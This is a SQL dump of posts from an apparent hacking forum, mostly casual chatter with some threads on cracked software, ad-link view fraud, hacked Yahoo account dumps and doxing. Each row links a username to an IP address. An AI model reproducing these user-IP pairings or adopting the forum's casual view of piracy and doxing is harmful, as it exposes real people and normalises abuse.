`disableeditedby`, `edittime2`) VALUES ('7368', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352550814', 'I\'ll take a look into this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'da7076cac8490caf85a2dd9012169ea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7369', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '62', 'R?????zo?', '1352550890', 'yeah it works like a charm :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '19f621bfe481b36b354d60a7072e70f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7370', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1352550904', 'Gonna post some maybe tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8fde1b8cd77f2e231ed365e3607014a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7372', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '62', 'R?????zo?', '1352551004', 'Never got hacked throught pishing :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9ec535c88526d3f39fed7edca27287e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7373', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352551007', 'I get this issue whenever I post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af2717db781ae9feace5f3a712c0c922', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7374', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '82', 'iTzIpod', '1352551072', 'Good job p420 keep up the content.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d88559c138652b5514cb468df16bf7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7375', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352551132', 'Congratulations everyone on their post milestones.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '51592bea36c2489c6ef8b3a66cc1a27c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7376', '426', '7339', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1352551193', '[quote=\'t3h jok3r\' pid=\'7339\' dateline=\'1352529485\'] Downloaded it. Is this the same pack I gave you once Ipod? Anyway I verified that mediafire download ID g8qa22aqmftitlq is safe. [/quote] No. It was a different pack. But yeah thanks for verifying it\'s safe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ed7a6a31c9a63db154294bd5da96d30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7377', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352551261', 'You can put the files anywhere. It doesn\'t matter where you put it. I just put mine in my Downloads folder or on my desktop files. Either way it doesn\'t matter. It still opens and runs perfectly fine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '575fd4cbcf9dd5f053b527793ce0af3c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7378', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352551301', '62 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cd22af5e9c9333c5328a0179895c0b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7379', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352551355', 'Looks like I won again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f6b606b50cebb884f7a11b5b205d0c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7380', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352551403', '/me is happy it\'s the weekend.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16277dc057ff76bf803e14fa80caadbd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7381', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352551441', 'Granted but it wouldn\'t work. I wish the weekend is more than 2 days.. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47a24324567dcb7e19d0440c4fff0b66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7382', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352551496', '@Romdu62 what can you do with a L33tHacking Forwarder email. ._. 10/10 Trey.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f09ce602a8c27055db8337059c5b3637', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7383', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352551526', 'Banned for having the Angel award.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '81c233afcfb7865fe411f5f21347762c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7384', '1246', '7345', '65', 'RE: L33T Hacking Video', '0', '82', 'iTzIpod', '1352551572', 'Nice video Timmy. Thanks for the major contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0985b72c2635b44bec69865ff37d1a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7385', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '82', 'iTzIpod', '1352551606', 'Oh okay @sirchamp, I didn\'t know that. :/ That sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6d92e851604fbd8efc35fbfa0e246c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7386', '1242', '7327', '34', 'RE: Another thread design PSD', '0', '82', 'iTzIpod', '1352551639', 'Oh my God this thread design is so nice!! Thanks for sharing', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1ae58d89f97996ecc3c9603d40e203a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7465', '1251', '7462', '3', 'RE: [Bug] Award Icons', '0', '1', 't3h jok3r', '1352603851', 'It\'s fixed now. Thanks for reporting.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c458615df1dcd93a415c68b3e79ebdd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7466', '1170', '7461', '63', 'RE: Need a sig', '0', '1', 't3h jok3r', '1352603954', '[quote=\'iTzIpod\' pid=\'7461\' dateline=\'1352598065\'] What do you mean? Like make it match the forum\'s colors? [/quote] I do think he means that. He just didn\'t capitalize LH, if you do then the meaning is clear.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f1a8a32e6af661799be98675c29c6014', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7388', '1232', '7289', '9', 'RE: Adfoc.us Trick', '0', '341', 'bouabda', '1352555401', 'Thnaks dude , i appriciate it ^^', '197.6.136.191', '-989427521', '0', '0', '0', '0', '1', '4ad9b519930afdb9103595e052f1bb6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7389', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '341', 'bouabda', '1352555433', 'thanx bro :D keep us posted', '197.6.136.191', '-989427521', '0', '0', '0', '0', '1', 'ac8fe7a593dc4399bdf0c13d2aacb95f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7390', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '257', 'XxTREYZxX', '1352557552', 'I will be glad to try this.posting for it', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '22b1eb5b9aad9e413bedfb63d0c9f704', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7391', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352558249', 'Band because he is a ipod', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'c296b593df9ad67ed40cbae5605140b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7392', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '228', 'VirtualLegend', '1352558270', 'I have the same problems, First i thought it was just me', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '1b4e4003395c08fc22a365d8f009d18a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7393', '238', '1021', '56', 'RE: Ban the user above you', '0', '228', 'VirtualLegend', '1352558312', 'Banned for a stupid comment', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '81356ba60a9a12ffa9f5118eaf2fbcf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7394', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '257', 'XxTREYZxX', '1352558418', 'We all have the same problem so hopefully it gets fixed.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'dd6e335c0edde4e474cee547ac47d4f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7395', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352559797', 'banned for having 10 rep. too even', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'aff0da6a8dc61edefeeec0c1ce8d52aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7396', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352560685', 'Banned for having 13 rep.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4034a9879fadf986022a07511daea54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7397', '1050', '6058', '7', 'RE: What do you do to relax?', '0', '82', 'iTzIpod', '1352562104', 'I usually make graphics from tutorials I find on a different forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0768f4aee6d274dbdb2d90524a0aa7f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7399', '1222', '7232', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '4', 'Triple H', '1352571980', 'Hoping my email address is not on the list. Thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70dbffe0f21863db8205dde5a0efc436', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7400', '991', '5592', '14', 'RE: VPN Accounts With Guide :)', '0', '4', 'Triple H', '1352572115', 'Thanks this is a great tutorial. I needed help for VPNReactor.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '62bb07c71f2ec5b72ce8d4a05fa815a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7401', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '61', 'NXK', '1352572938', 'Hi! Welcome I hope you enjoy us here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '8cc79cfdbb79032d34480dfa55e7edb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7402', '1144', '6958', '11', 'RE: What can you do with?', '0', '53', 'sirchamp', '1352575400', '[quote=\'Triple H\' pid=\'6958\' dateline=\'1351918876\'] You can DOX them, boot them offline, send them viruses or steal all their keystrokes. [/quote] You cant send them virues or steal their keystrokes if you have their ip adress lol.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd4e38f33e006d7b1a6055b062dc3b24a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7403', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '61', 'NXK', '1352575842', 'I like number 2.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f0244734bff9253edc3ae22c9c986ae1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7404', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '1', 't3h jok3r', '1352576286', 'Uhh can admins get a free one and does this work for adf.ly?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'abd4ded499e8c7e3daab9f13a3540b19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7405', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '1', 't3h jok3r', '1352576457', 'Welcome to L33T Hacking. Hope you enjoy your stay. Feel free to contact me if you need help or have any questions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ee351733eb4f4852511f20daa6408f80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7406', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '342', 'Squirt1971', '1352577053', 'Thanks for the welcoming :D', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', 'fe1d22a1fa3d4c3c2458f1be2c8a4c46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7407', '1248', '0', '3', 'Recent Updates', '0', '1', 't3h jok3r', '1352577684', 'I have been updating a lot of things on L33T Hacking but didn\'t inform the community well anyways here\'s some of the updates. [color=#FF0000]Marketplace will be added soon in November.[/color] [color=#1E90FF]We are having some [url=http://l33thacking.net/thread-1236.html]Cloudflare issues[/url] which I am currently working on.[/color] [color=#FFA500]Username changes, IP log History and Myawards plugins are completely removed from LH because the plugins are outdated and the old man Omni is too lazy.[/color] [color=#32CD32]I\'m planning on expanding LH especially the hacking section but in order to expand I need more active members. If you would like to help advertise LH then PM me or share LH on sites you visit everyday. Adding new forums in the computing section, if you want to see a section then suggest one [url=http://l33thacking.net/thread-1169.html]here[/url][/color] [color=#800080]I have changed the Rep abuse section name to \"Private Inquiries\". Read the forum rules to know what you are allowed to post about.[/color] [color=#A9A9A9]There have been some changes in the report system. If you see a thread with a download but no virus scan you can report it as \"infected download/link or no virus scan\". I also added a new report reason called \"Post here & PM\" to report all post here and I pm you or you PM me threads.[/color] [color=#FF4500]We might be getting new userbars for LH, there will be thread for the community to vote.[/color] [color=#800000]Username in welcome block :- I know it\'s kinda hard to read sometimes but I\'m currently working on it. The theme we are using is old.[/color] [color=#FF1493]Our Alexa rank is now below 2,000. A month ago it was 5,000, L33T Hacking is growing fast :D Here\'s a link to our Alexa page: [/color] http://www.alexa.com/siteinfo/l33thacking.net', '72.231.24.165', '1223104677', '1', '0', '1', '1352578807', '1', 'ff9761f400449ae0ebde55f71481de9b', '0', '1352578807'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7408', '1248', '7407', '3', 'RE: Updates for the November', '0', '61', 'NXK', '1352578135', 'Yay! More progress is being made and to see we\'re getting more popular is very nice!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'ce5423c339e13a3e9b5c11b886d8ff09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7409', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352579944', 'Good job t3h jok3r. :) I\'ll continue to be active.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ef4c4656944ba1396803a197392c3fe8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7410', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352579990', 'I doubt it works for Adf.ly since Adf.ly only allows 1 Adf.ly link open at a time. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd247cec6c306bd504886aec4e8cae36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7411', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '82', 'iTzIpod', '1352580055', 'Welcome to the forum Squirt1971! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb7f0a29e8fff5ef4aceeeadde23532e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7412', '1249', '0', '35', 'New Avatar', '0', '82', 'iTzIpod', '1352580089', 'Do you guys like my new avatar? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0b775ecc24bedfa22331258a00f512eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7413', '1248', '7407', '3', 'RE: Recent Updates', '0', '228', 'VirtualLegend', '1352580220', 'Okay thanks for the heads up', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '46257e7d8e4d53834edf25d96b29a7a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7414', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '228', 'VirtualLegend', '1352580285', 'I agree with NXK Number 2', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c2b888ec46738032d6667ab42926ca63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7415', '1249', '7412', '35', 'RE: New Avatar', '0', '228', 'VirtualLegend', '1352580321', 'I Like the pokemon before', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '92f53471980a29d71b0f940407ed6233', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7416', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1352580396', 'Trust me it works, I\'m using it daily', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '29b8bce85b7fa676b4375f7f2c52a8a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7417', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352583431', ':p I like this one better! >:D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6330bacaca1c32a3c5ba5a1c40effa00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7418', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '82', 'iTzIpod', '1352583485', 'Set #2 looks fancy. :p I like it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1b9700315f07784c6f5cdb60d7e6678f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7419', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352583518', 'For Adf.ly? Did you get paid?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d6c80b103e1b63b3cff823d0a210de8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7420', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '62', 'R?????zo?', '1352587541', 'Keep the current ones pleaaaaase!', '94.132.244.168', '1585771688', '1', '0', '0', 